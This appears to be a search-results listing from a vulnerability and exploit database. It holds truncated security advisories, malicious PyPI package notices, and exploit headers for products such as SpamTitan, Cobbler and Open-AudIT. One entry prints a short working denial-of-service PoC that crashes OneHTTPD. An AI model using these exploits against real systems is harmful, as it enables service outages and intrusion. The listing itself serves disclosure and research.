22 matches found
USN-7762-1: pip vulnerabilities
Dennis Brinkrolf and Tobias Funke discovered that Requests incorrectly leaked Proxy-Authorization headers. A remote attacker could possibly use this issue to obtain sensitive information. This update addresses the issue in the Requests module bundled into pip in Ubuntu 22.04 LTS. CVE-2023-32681 I...
Beebeeto-framework
This is a Python framework for building and executing proof-of-concept (PoC) exploits, specifically targeting the HttpFileServer (HFS) vulnerability. The framework is called Beebeeto and is maintained by the n0tr00t security team. The framework provides a set of tools and libraries for creating and...
Malicious code in new-requests-module (PyPI)
MAL-2025-41707 Malicious code in new-requests-module (PyPI)
MAL-2025-965 Malicious code in reqesst (PyPI)
Source: kam193 8e4a4682ad923d5e0f2e444487e5f42a4bae8d753ecd747f7b652e407f5cc32f Importing the module downloads and starts an infostealer attempting to exfiltrate data and establishing persistence through autorun directory. --- Category:...
SmartAgent 1.1.0 Remote Code Execution
Exploit Title: SmartAgent v1.1.0 - Unauthenticated Remote Code Execution Date: 01-10-2024 Exploit Author: Alter Prime Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com Version: Build v1.1.0 Tested on: Kali Linux An unauthenticated user can access a php script called...
A vulnerability in GLPI, a system for managing requests, incidents, and computer equipment inventory, related to improper neutralization of special elements used in SQL commands, allows an attacker to modify another user’s account data and gain control over the account.
This vulnerability in GLPI, a system for managing requests, incidents, and computer equipment inventory, is related to improper neutralization of special elements used in SQL commands. Exploiting it allows a malicious actor to remotely modify another user’s account data and gain...
Hitachi NAS SMU Backup And Restore Insecure Direct Object Reference
!/usr/bin/python3 Title: Hitachi NAS HNAS System Management Unit SMU Backup & Restore IDOR Vulnerability CVE: CVE-2023-5808 Date: 2023-12-13 Exploit Author: Arslan Masood @arszilla Vendor: https://www.hitachivantara.com/ Version: --id --sso " Create --host argument: parser.addargument "--host",...
A vulnerability in GLPI, a system for managing requests, incidents, and computer equipment inventory, related to unrestricted upload of files of a dangerous type, allows an attacker to upload any files to the system.
This vulnerability in GLPI, a system for managing requests, incidents, and computer equipment inventory, is related to unrestricted upload of dangerous files. Exploiting it allows a malicious actor to upload any files to the system...
SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated) Exploit
!/usr/bin/python3 Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored Authenticated Google Dork: intitle:"SCM Manager" intext:1.60 Date: 05-25-2023 Exploit Author: neg0x https://github.com/n3gox/CVE-2023-33829 Vendor Homepage: https://scm-manager.org/ Software Link:...
Exploit for OS Command Injection in Netgate Pfblockerng
pfBlockerNG T...
Exploit for Cross-Site Request Forgery (CSRF) in Cisco Industrial_Network_Director
PoC exploit for CVE-2019-18818, an unauthenticated password rese...
SUSE: Security Advisory (SUSE-SU-2016:0114-1)
The remote host is missing an update for the SPDX-FileCopyrightText: 2021 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
SpamTitan 7.07 Remote Code Execution
Exploit Title: SpamTitan 7.07 - Remote Code Execution Authenticated Date: 2020-09-18 Exploit Author: Felipe Molina @felmoltor Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/ Software Link: https://www.titanhq.com/signup/?producttype=spamtitangateway Version: 7.07 Tested on:...
Open-AudIT Professional 3.3.1 Remote Code Execution
Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution Date: 2020-04-22 Exploit Author: Askar CVE: CVE-2020-12078 Vendor Homepage: https://opmantek.com/ Version: v3.3.1 Tested on: Ubuntu 18.04 / PHP 7.2.24 !/usr/bin/python3 import requests import sys import warnings import random...
Web-Traffic-Generator - A Quick And Dirty HTTP/S "Organic" Traffic Generator
Just a simple poorly written Python script that aimlessly "browses" the internet by starting at pre-defined rootURLs and randomly "clicking" links on pages until the pre-defined clickDepth is met. I created this as a noise generator to use for an Incident Response / Network Defense simulation. Th...
Cobbler 2.8.0 - (Authenticated) Remote Code Execution
!/usr/bin/python """ Exploit title: Cobbler 2.8.x Authenticated RCE. Author: Dolev Farhi Contact: dolevf at protonmail.com @hack6tence Date: 03-16-2017 Vendor homepage: cobbler.github.io Software version: v.2.5.160805 Software Description ===================== Cobbler is a Linux installation serv...
BackdoorMan - Toolkit That Helps You Find Malicious, Hidden And Suspicious PHP Scripts And Shells
A Python open source toolkit that helps you find malicious, hidden and suspicious PHP scripts and shells in a chosen destination; it automates the process of detecting the above. Purpose: The main purpose of BackdoorMan is to help web-masters and developers to discover malicious scripts in their...
MoinMoin - Arbitrary Command Execution
No description provided by source.
OneHTTPD 0.8 - Crash PoC
Exploit for windows platform in category dos / poc from requests import get,ConnectionError as cerror from sys import argv iflenargv!=2: print '%s host' % argv0 else: buff = '/'245 script,host=argv try: get'http://'+host+':8080/'+buff except cerror: exit1 0day.today 2018-04-02...